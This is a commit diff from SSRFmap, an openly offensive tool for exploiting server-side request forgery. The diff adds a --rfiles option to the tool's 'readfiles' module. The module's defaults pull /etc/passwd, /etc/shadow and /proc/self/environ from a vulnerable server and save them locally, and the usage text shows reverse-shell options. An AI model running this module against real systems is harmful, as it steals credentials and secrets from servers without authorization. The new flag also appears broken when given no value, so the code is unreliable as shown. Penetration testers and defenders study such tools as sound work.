Merge pull request #35 from ScarletTeam/master

Allows readfiles module to read specific files specified in a parameter when starting the ssrfmap.py script
pull/41/head
Swissky 2021-02-03 15:20:53 +01:00 committed by GitHub
commit c7922ba0ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 12 additions and 5 deletions

View File

@ -1,6 +1,7 @@
from core.utils import *
import logging
import os
from argparse import ArgumentParser
name = "readfiles"
description = "Read files from the target"
@ -8,12 +9,13 @@ author = "Swissky"
documentation = []
class exploit():
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
r = requester.do_request(args.param, "")
if r != None:
default = r.text
@ -36,3 +38,6 @@ class exploit():
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
with open(directory + "/" + filename, 'w') as f:
f.write(diff)
else:
print("Empty response")

View File

@ -23,6 +23,7 @@ def parse_args():
python ssrfmap.py -r data/request.txt -p url -m redis
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
'''
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
@ -32,10 +33,11 @@ def parse_args():
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
results = parser.parse_args()
results = parser.parse_args()
if results.reqfile == None:
parser.print_help()
@ -55,4 +57,4 @@ if __name__ == "__main__":
# SSRFmap
args = parse_args()
ssrf = SSRF(args)
ssrf = SSRF(args)